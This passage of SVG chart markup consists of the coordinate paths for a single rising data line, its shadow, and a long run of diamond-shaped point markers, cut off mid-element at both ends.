167.23873785599963 L 269.78952205882354 165.79854393599962 L 271.31755514705884 164.34552729599963 L 272.84558823529414 163.81610169599963 L 274.37362132352945 163.5164656319996 L 275.9016544117647 163.5164656319996 L 277.4296875 163.5164656319996 L 278.9577205882353 163.5164656319996 L 280.4857536764706 162.96027571199963 L 282.0137867647059 162.46325263999915 L 283.54181985294116 161.76315343999914 L 285.06985294117646 156.51088207999913 L 286.59788602941177 150.98766415999916 L 288.1259191176471 145.64261455999912 L 289.6539522058824 144.91086703999912 L 291.1819852941177 139.12849519999915 L 292.7100183823529 133.04782639999914 L 294.23805147058823 127.76958991999913 L 295.76608455882354 123.83113231999914 L 297.29411764705884 121.19799209599915 L 298.82215073529414 116.31456041599915 L 300.35018382352945 110.97760937599915 L 301.8782169117647 106.29866633599914 L 303.40625 101.35044617599914 L 304.9342830882353 98.07425897599916 L 306.4623161764706 94.82081167999914 L 307.9903492647059 92.1447269866654 L 309.51838235294116 89.74272803199796 L 311.04641544117646 89.74272803199796 L 312.57444852941177 89.74272803199796 L 314.1024816176471 89.37896771199794 L 315.6305147058824 88.01867603199796 L 317.1585477941177 88.01867603199796 L 318.6865808823529 88.01867603199796 L 320.21461397058823 88.01867603199796 L 321.74264705882354 88.01867603199796 L 323.27068014705884 88.01867603199796 L 324.79871323529414 85.62675923199558 L 326.32674632352945 79.24239443199559 L 327.8547794117647 73.29805139199559 L 329.3828125 68.96262227199557 L 330.9108455882353 61.243344831995586 L 332.4388786764706 61.243344831995586 L 333.9669117647059 61.243344831995586 L 335.4949448529412 61.243344831995586 L 337.02297794117646 61.243344831995586 L 338.55101102941177 61.243344831995586 L 340.0790441176471 61.243344831995586 L 341.6070772058824 61.243344831995586 L 343.1351102941177 61.243344831995586 L 344.6631433823529 61.243344831995586 L 346.19117647058823 61.243344831995586 L 347.71920955882354 61.243344831995586 L 349.24724264705884 61.243344831995586 L 350.77527573529414 56.36598707199559 L 352.30330882352945 51.59593523199558 L 353.8313419117647 51.59593523199558 L 355.359375 47.1822200319956 L 356.8874080882353 47.1822200319956 L 358.4154411764706 47.1822200319956 L 359.9434742647059 47.1822200319956 L 361.4715073529412 47.1822200319956 L 362.99954044117646 47.1822200319956 L 364.52757352941177 47.1822200319956 L 366.0556066176471 47.1822200319956 L 367.5836397058824 47.1822200319956 L 369.1116727941177 47.1822200319956 L 370.6397058823529 47.1822200319956 L 372.16773897058823 47.1822200319956 L 373.69577205882354 47.1822200319956 L 375.22380514705884 47.1822200319956 L 376.75183823529414 47.1822200319956 L 378.27987132352945 46.90146995199555 L 379.8079044117647 46.90146995199555 L 381.3359375 41.28916787199557 L 382.8639705882353 39.96640307199556 L 384.3920036764706 39.96640307199556 L 385.9200367647059 39.96640307199556 L 387.4480698529412 39.96640307199556 L 388.97610294117646 39.96640307199556 L 390.50413602941177 39.96640307199556 L 392.0321691176471 37.22124776532809 L 393.5602022058824 35.36195336532808 L 395.0882352941177 35.05488296532809" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.50725481600034 L 136.85064338235296 235.89758953600034 L 138.37867647058823 235.89758953600034 L 139.90670955882354 235.89758953600034 L 141.43474264705884 235.89758953600034 L 142.96277573529412 235.89758953600034 L 144.49080882352942 235.36319824000034 L 146.01884191176472 234.61045208533338 L 147.546875 233.96754797866723 L 149.0749080882353 232.6885438186672 L 150.6029411764706 231.93467444266722 L 152.13097426470588 231.04398913066746 L 153.6590073529412 229.45447228800128 L 155.18704044117646 227.6403948480013 L 156.71507352941177 225.1495548480013 L 158.24310661764707 223.5329970240013 L 159.77113970588235 221.9904865600013 L 161.29917279411765 220.9099681600013 L 162.82720588235296 220.2150485653341 L 164.35523897058823 218.3091874453341 L 165.88327205882354 216.68347256533409 L 167.41130514705884 213.77069048533406 L 168.93933823529412 212.36736632533407 L 170.46737132352942 209.9027045653341 L 171.99540441176472 209.23052408533408 L 173.5234375 207.43804280533408 L 175.0514705882353 206.15264504533408 L 176.5795036764706 204.6402389653341 L 178.10753676470588 202.88960024533407 L 179.6355698529412 201.74677976533405 L 181.1636029411765 200.21007800533408 L 182.69163602941177 199.2723500053341 L 184.21966911764707 198.50812299733408 L 185.74770220588235 198.50812299733408 L 187.27573529411765 198.1032435413342 L 188.80376838235296 197.5879193813342 L 190.33180147058823 196.38461386666745 L 191.85983455882354 195.82815281066746 L 193.38786764705884 195.82815281066746 L 194.91590073529412 195.82815281066746 L 196.44393382352942 195.82815281066746 L 197.97196691176472 195.82815281066746 L 199.5 195.82815281066746 L 201.0280330882353 195.82815281066746 L 202.5560661764706 195.82815281066746 L 204.08409926470588 195.34348951466745 L 205.6121323529412 194.74195357866745 L 207.1401654411765 194.13355320533395 L 208.66819852941177 194.0161398720007 L 210.19623161764707 193.83215416533406 L 211.72426470588235 193.4435061653341 L 213.25229779411765 193.1748009173341 L 214.78033088235296 191.56097497600047 L 216.30836397058823 188.2339231360005 L 217.83639705882354 184.73547308800025 L 219.36443014705884 184.41820844800026 L 220.89246323529412 184.41820844800026 L 222.42049632352942 184.41820844800026 L 223.94852941176472 184.41820844800026 L 225.4765625 184.41820844800026 L 227.0045955882353 184.41820844800026 L 228.5326286764706 184.41820844800026 L 230.06066176470588 184.41820844800026 L 231.5886948529412 184.41820844800026 L 233.1167279411765 184.41820844800026 L 234.64476102941177 184.41820844800026 L 236.17279411764707 183.20274956800023 L 237.70082720588238 180.34217399466627 L 239.22886029411765 179.20730999466628 L 240.75689338235296 178.37752727466628 L 242.28492647058823 178.37752727466628 L 243.81295955882354 178.26970118399976 L 245.34099264705884 178.26970118399976 L 246.86902573529412 178.26970118399976 L 248.39705882352942 178.26970118399976 L 249.92509191176472 178.26970118399976 L 251.453125 178.26970118399976 L 252.9811580882353 178.26970118399976 L 254.5091911764706 177.60764390399976 L 256.0372242647059 176.21131718399977 L 257.56525735294116 175.39002374399976 L 259.09329044117646 174.36015686399975 L 260.62132352941177 172.34496518399976 L 262.1493566176471 171.51937382399976 L 263.6773897058824 171.14074483199977 L 265.2054227941177 170.61452313599963 L 266.7334558823529 167.69499225599964 L 268.26148897058823 167.23873785599963 L 269.78952205882354 165.79854393599962 L 271.31755514705884 164.34552729599963 L 272.84558823529414 163.81610169599963 L 274.37362132352945 163.5164656319996 L 275.9016544117647 163.5164656319996 L 277.4296875 163.5164656319996 L 278.9577205882353 163.5164656319996 L 280.4857536764706 162.96027571199963 L 282.0137867647059 162.46325263999915 L 283.54181985294116 161.76315343999914 L 285.06985294117646 156.51088207999913 L 286.59788602941177 150.98766415999916 L 288.1259191176471 145.64261455999912 L 289.6539522058824 144.91086703999912 L 291.1819852941177 139.12849519999915 L 292.7100183823529 133.04782639999914 L 294.23805147058823 127.76958991999913 L 295.76608455882354 123.83113231999914 L 297.29411764705884 121.19799209599915 L 298.82215073529414 116.31456041599915 L 300.35018382352945 110.97760937599915 L 301.8782169117647 106.29866633599914 L 303.40625 101.35044617599914 L 304.9342830882353 98.07425897599916 L 306.4623161764706 94.82081167999914 L 307.9903492647059 92.1447269866654 L 309.51838235294116 89.74272803199796 L 311.04641544117646 89.74272803199796 L 312.57444852941177 89.74272803199796 L 314.1024816176471 89.37896771199794 L 315.6305147058824 88.01867603199796 L 317.1585477941177 88.01867603199796 L 318.6865808823529 88.01867603199796 L 320.21461397058823 88.01867603199796 L 321.74264705882354 88.01867603199796 L 323.27068014705884 88.01867603199796 L 324.79871323529414 85.62675923199558 L 326.32674632352945 79.24239443199559 L 327.8547794117647 73.29805139199559 L 329.3828125 68.96262227199557 L 330.9108455882353 61.243344831995586 L 332.4388786764706 61.243344831995586 L 333.9669117647059 61.243344831995586 L 335.4949448529412 61.243344831995586 L 337.02297794117646 61.243344831995586 L 338.55101102941177 61.243344831995586 L 340.0790441176471 61.243344831995586 L 341.6070772058824 61.243344831995586 L 343.1351102941177 61.243344831995586 L 344.6631433823529 61.243344831995586 L 346.19117647058823 61.243344831995586 L 347.71920955882354 61.243344831995586 L 349.24724264705884 61.243344831995586 L 350.77527573529414 56.36598707199559 L 352.30330882352945 51.59593523199558 L 353.8313419117647 51.59593523199558 L 355.359375 47.1822200319956 L 356.8874080882353 47.1822200319956 L 358.4154411764706 47.1822200319956 L 359.9434742647059 47.1822200319956 L 361.4715073529412 47.1822200319956 L 362.99954044117646 47.1822200319956 L 364.52757352941177 47.1822200319956 L 366.0556066176471 47.1822200319956 L 367.5836397058824 47.1822200319956 L 369.1116727941177 47.1822200319956 L 370.6397058823529 47.1822200319956 L 372.16773897058823 47.1822200319956 L 373.69577205882354 47.1822200319956 L 375.22380514705884 47.1822200319956 L 376.75183823529414 47.1822200319956 L 378.27987132352945 46.90146995199555 L 379.8079044117647 46.90146995199555 L 381.3359375 41.28916787199557 L 382.8639705882353 39.96640307199556 L 384.3920036764706 39.96640307199556 L 385.9200367647059 39.96640307199556 L 387.4480698529412 39.96640307199556 L 388.97610294117646 39.96640307199556 L 390.50413602941177 39.96640307199556 L 392.0321691176471 37.22124776532809 L 393.5602022058824 35.36195336532808 L 395.0882352941177 35.05488296532809" fill="none" stroke="#7798BF" stroke-width="2"></path><path d="M 395 31 L 399 35 395 39 391 35 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 393.5 31.5 L 397.5 35.5 393.5 39.5 389.5 35.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 392 33 L 396 37 392 41 388 37 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 390.5 36 L 394.5 40 390.5 44 386.5 40 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 389 36 L 393 40 389 44 385 40 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 387.5 36 L 391.5 40 387.5 44 383.5 40 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 386 36 L 390 40 386 44 382 40 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 384.5 36 L 388.5 40 384.5 44 380.5 40 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 383 36 L 387 40 383 44 379 40 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 37.5 L 385.5 41.5 381.5 45.5 377.5 41.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 380 43 L 384 47 380 51 376 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 378.5 43 L 382.5 47 378.5 51 374.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 377 43 L 381 47 377 51 373 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 375 43 L 379 47 375 51 371 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 43 L 377.5 47 373.5 51 369.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 372 43 L 376 47 372 51 368 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 370.5 43 L 374.5 47 370.5 51 366.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 369 43 L 373 47 369 51 365 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 43 L 371.5 47 367.5 51 363.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 366 43 L 370 47 366 51 362 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 364.5 43 L 368.5 47 364.5 51 360.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 363 43 L 367 47 363 51 359 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 43 L 365.5 47 361.5 51 357.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 360 43 L 364 47 360 51 356 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 358.5 43 L 362.5 47 358.5 51 354.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 357 43 L 361 47 357 51 353 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 43 L 359.5 47 355.5 51 351.5 47 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 354 47.5 L 358 51.5 354 55.5 350 51.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 352.5 47.5 L 356.5 51.5 352.5 55.5 348.5 51.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 351 52.5 L 355 56.5 351 60.5 347 56.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 349 57 L 353 61 349 65 345 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 57 L 351.5 61 347.5 65 343.5 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 346 57 L 350 61 346 65 342 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 344.5 57 L 348.5 61 344.5 65 340.5 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 343 57 L 347 61 343 65 339 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 57 L 345.5 61 341.5 65 337.5 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 340 57 L 344 61 340 65 336 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 338.5 57 L 342.5 61 338.5 65 334.5 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 337 57 L 341 61 337 65 333 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 335.5 57 L 339.5 61 335.5 65 331.5 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 334 57 L 338 61 334 65 330 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 332.5 57 L 336.5 61 332.5 65 328.5 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 331 57 L 335 61 331 65 327 61 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 329.5 65 L 333.5 69 329.5 73 325.5 69 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 328 69.5 L 332 73.5 328 77.5 324 73.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 326.5 75 L 330.5 79 326.5 83 322.5 79 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 325 81.5 L 329 85.5 325 89.5 321 85.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 323.5 84 L 327.5 88 323.5 92 319.5 88 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 321.5 84 L 325.5 88 321.5 92 317.5 88 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 320 84 L 324 88 320 92 316 88 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 318.5 84 L 322.5 88 318.5 92 314.5 88 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 317 84 L 321 88 317 92 313 88 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 315.5 84 L 319.5 88 315.5 92 311.5 88 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 314 85.5 L 318 89.5 314 93.5 310 89.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 312.5 85.5 L 316.5 89.5 312.5 93.5 308.5 89.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 311 85.5 L 315 89.5 311 93.5 307 89.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 309.5 85.5 L 313.5 89.5 309.5 93.5 305.5 89.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 308 88 L 312 92 308 96 304 92 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 306.5 91 L 310.5 95 306.5 99 302.5 95 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 305 94 L 309 98 305 102 301 98 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 303.5 97.5 L 307.5 101.5 303.5 105.5 299.5 101.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 302 102.5 L 306 106.5 302 110.5 298 106.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 107 L 304.5 111 300.5 115 296.5 111 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 299 112.5 L 303 116.5 299 120.5 295 116.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 297.5 117 L 301.5 121 297.5 125 293.5 121 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 296 120 L 300 124 296 128 292 124 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 294 124 L 298 128 294 132 290 128 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 129 L 296.5 133 292.5 137 288.5 133 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 291 135 L 295 139 291 143 287 139 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 289.5 141 L 293.5 145 289.5 149 285.5 145 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 288 141.5 L 292 145.5 288 149.5 284 145.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 147 L 290.5 151 286.5 155 282.5 151 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 285 152.5 L 289 156.5 285 160.5 281 156.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 283.5 158 L 287.5 162 283.5 166 279.5 162 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 282 158.5 L 286 162.5 282 166.5 278 162.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 159 L 284.5 163 280.5 167 276.5 163 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 279 159.5 L 283 163.5 279 167.5 275 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 277.5 159.5 L 281.5 163.5 277.5 167.5 273.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 276 159.5 L 280 163.5 276 167.5 272 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 159.5 L 278.5 163.5 274.5 167.5 270.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 273 160 L 277 164 273 168 269 164 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 271.5 160.5 L 275.5 164.5 271.5 168.5 267.5 164.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 270 162 L 274 166 270 170 266 166 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 163 L 272.5 167 268.5 171 264.5 167 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 163.5 L 270.5 167.5 266.5 171.5 262.5 167.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 265 166.5 L 269 170.5 265 174.5 261 170.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 263.5 167 L 267.5 171 263.5 175 259.5 171 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 262 167.5 L 266 171.5 262 175.5 258 171.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 168.5 L 264.5 172.5 260.5 176.5 256.5 172.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 259 170.5 L 263 174.5 259 178.5 255 174.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 257.5 171.5 L 261.5 175.5 257.5 179.5 253.5 175.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 256 172 L 260 176 256 180 252 176 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 254.5 173.5 L 258.5 177.5 254.5 181.5 250.5 177.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 253 174.5 L 257 178.5 253 182.5 249 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 251.5 174.5 L 255.5 178.5 251.5 182.5 247.5 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 250 174.5 L 254 178.5 250 182.5 246 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 248.5 174.5 L 252.5 178.5 248.5 182.5 244.5 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 247 174.5 L 251 178.5 247 182.5 243 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 245.5 174.5 L 249.5 178.5 245.5 182.5 241.5 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 244 174.5 L 248 178.5 244 182.5 240 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 242.5 174.5 L 246.5 178.5 242.5 182.5 238.5 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 241 174.5 L 245 178.5 241 182.5 237 178.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 239 175 L 243 179 239 183 235 179 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 237.5 176.5 L 241.5 180.5 237.5 184.5 233.5 180.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 236 179 L 240 183 236 187 232 183 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 234.5 180.5 L 238.5 184.5 234.5 188.5 230.5 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 233 180.5 L 237 184.5 233 188.5 229 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 231.5 180.5 L 235.5 184.5 231.5 188.5 227.5 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 230 180.5 L 234 184.5 230 188.5 226 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 228.5 180.5 L 232.5 184.5 228.5 188.5 224.5 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 227 180.5 L 231 184.5 227 188.5 223 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 225.5 180.5 L 229.5 184.5 225.5 188.5 221.5 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 224 180.5 L 228 184.5 224 188.5 220 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 222.5 180.5 L 226.5 184.5 222.5 188.5 218.5 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 221 180.5 L 225 184.5 221 188.5 217 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 180.5 L 223.5 184.5 219.5 188.5 215.5 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 218 180.5 L 222 184.5 218 188.5 214 184.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 216.5 184 L 220.5 188 216.5 192 212.5 188 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 215 187.5 L 219 191.5 215 195.5 211 191.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 189 L 217.5 193 213.5 197 209.5 193 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 189.5 L 215.5 193.5 211.5 197.5 207.5 193.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 210 190 L 214 194 210 198 206 194 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 208.5 190 L 212.5 194 208.5 198 204.5 194 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 207 190 L 211 194 207 198 203 194 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 190.5 L 209.5 194.5 205.5 198.5 201.5 194.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 204 191.5 L 208 195.5 204 199.5 200 195.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 202.5 192 L 206.5 196 202.5 200 198.5 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 201 192 L 205 196 201 200 197 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 192 L 203.5 196 199.5 200 195.5 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 198 192 L 202 196 198 200 194 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 196.5 192 L 200.5 196 196.5 200 192.5 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 195 192 L 199 196 195 200 191 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 192 L 197.5 196 193.5 200 189.5 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 192 192 L 196 196 192 200 188 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 190.5 192.5 L 194.5 196.5 190.5 200.5 186.5 196.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 189 193.5 L 193 197.5 189 201.5 185 197.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 194 L 191.5 198 187.5 202 183.5 198 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 194.5 L 189.5 198.5 185.5 202.5 181.5 198.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 184 194.5 L 188 198.5 184 202.5 180 198.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 182.5 195.5 L 186.5 199.5 182.5 203.5 178.5 199.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 181 196 L 185 200 181 204 177 200 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 197.5 L 183.5 201.5 179.5 205.5 175.5 201.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 178 199 L 182 203 178 207 174 203 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 176.5 200.5 L 180.5 204.5 176.5 208.5 172.5 204.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 175 202 L 179 206 175 210 171 206 Z" 